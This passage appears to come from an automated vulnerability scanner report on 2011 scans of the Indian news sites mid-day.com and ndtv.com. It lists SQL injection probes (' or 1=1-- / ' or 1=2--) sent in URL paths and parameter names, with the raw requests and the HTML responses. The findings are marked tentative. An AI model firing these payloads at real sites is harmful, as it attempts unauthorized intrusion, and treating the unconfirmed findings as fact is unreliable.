<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.7. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11545130'%20or%201%3d1--%20 and 11545130'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local11545130'%20or%201%3d1--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local11545130' or 1=1-- /index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local11545130'%20or%201%3d2--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 21
Date: Sun, 04 Sep 2011 04:40:13 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.8. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20305888'%20or%201%3d1--%20 and 20305888'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm20305888'%20or%201%3d1--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm20305888' or 1=1-- /x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm20305888'%20or%201%3d2--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 27
Date: Sun, 04 Sep 2011 04:40:19 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.9. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19887943'%20or%201%3d1--%20 and 19887943'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm/x26amp19887943'%20or%201%3d1--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm/x26amp19887943' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm/x26amp19887943'%20or%201%3d2--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local News - National News, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore">

<link rel="stylesheet" type="text/css" href="/css/pV/sectionpages060709.css" />
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-base-07-04-09.css">
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-bar-07-04-09.css">

<script language="Javascript" type="text/javascript" src="/js/realmedia.js"></script>
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>
<script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript
...[SNIP]...

1.10. http://www.mid-day.com/news/local/index.htm/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18183999%20or%201%3d1--%20 and 18183999%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm/x26amp?118183999%20or%201%3d1--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm/x26amp?118183999%20or%201%3d2--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:30 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local News - National News, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore">

<link rel="stylesheet" type="text/css" href="/css/pV/sectionpages060709.css" />
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-base-07-04-09.css">
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-bar-07-04-09.css">

<script language="Javascript" type="text/javascript" src="/js/realmedia.js"></script>
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>
<script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript
...[SNIP]...

1.11. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ndtv.com
Path:   /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14708257%20or%201%3d1--%20 and 14708257%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142?114708257%20or%201%3d1--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 69784
Cache-Control: max-age=120
Expires: Sun, 04 Sep 2011 02:34:22 GMT
Date: Sun, 04 Sep 2011 02:32:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-runway-revamped/200802" title="Mumbai airport runway revamped">
<img src="http://drop.ndtv.com/videothumb/thumb_200802_1306476912.jpg" width="75" height="60" alt="" />
<span>Mumbai airport runway revamped</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/bipasha-detained-at-mumbai-airport/200689" title="Bipasha detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_200689_1306395956.jpg" width="75" height="60" alt="" />
<span>Bipasha detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/minissha-lamba-detained-at-mumbai-airport/199920" title="Minissha Lamba detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_199920_1305721413.jpg" width="75" height="60" alt="" />
<span>Minissha Lamba detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/pilots-strike-chaos-nightmare-inside-airports/198116" title="Pilots' strike: Chaos, nightmare inside airports">
<img src="http://drop.ndtv.com/videothumb/thumb_198116_1304502010.jpg" width="75" height="60" alt="" />
<span>Pilots' strike: Chaos, nightmare inside airpo ...</span>
</a>

...[SNIP]...

Request 2

GET /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142?114708257%20or%201%3d2--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 70003
Cache-Control: max-age=117
Expires: Sun, 04 Sep 2011 02:34:19 GMT
Date: Sun, 04 Sep 2011 02:32:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</li>
<li><a href="http://www.ndtv.com/article/india/anushka-sharma-questioned-at-mumbai-airport-115128">Anushka Sharma questioned at Mumbai airport </a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-runway-revamped/200802" title="Mumbai airport runway revamped">
<img src="http://drop.ndtv.com/videothumb/thumb_200802_1306476912.jpg" width="75" height="60" alt="" />
<span>Mumbai airport runway revamped</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/bipasha-detained-at-mumbai-airport/200689" title="Bipasha detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_200689_1306395956.jpg" width="75" height="60" alt="" />
<span>Bipasha detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/minissha-lamba-detained-at-mumbai-airport/199920" title="Minissha Lamba detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_199920_1305721413.jpg" width="75" height="60" alt="" />
<span>Minissha Lamba detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/pilots-strike-chaos-nightmare-inside-airports/198116" title="Pilots' strike: Chaos, nightmare inside airports">
<
...[SNIP]...

1.12. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ndtv.com
Path:   /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17974436'%20or%201%3d1--%20 and 17974436'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india17974436'%20or%201%3d1--%20/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68827
Cache-Control: max-age=569
Expires: Sun, 04 Sep 2011 03:36:33 GMT
Date: Sun, 04 Sep 2011 03:27:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-11-pm-flights-delayed-131003">Mumbai airport's main runway shut till 11 pm, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane ski
...[SNIP]...

Request 2

GET /article/india17974436'%20or%201%3d2--%20/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68797
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 03:37:05 GMT
Date: Sun, 04 Sep 2011 03:27:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003">Mumbai airport's main runway still shut, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off, run
...[SNIP]...

1.13. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ndtv.com
Path:   /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11599280%20or%201%3d1--%20 and 11599280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917?111599280%20or%201%3d1--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68778
Cache-Control: max-age=548
Expires: Sun, 04 Sep 2011 03:35:51 GMT
Date: Sun, 04 Sep 2011 03:26:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003">Mumbai airport's main runway still shut, flights delayed</a></li>
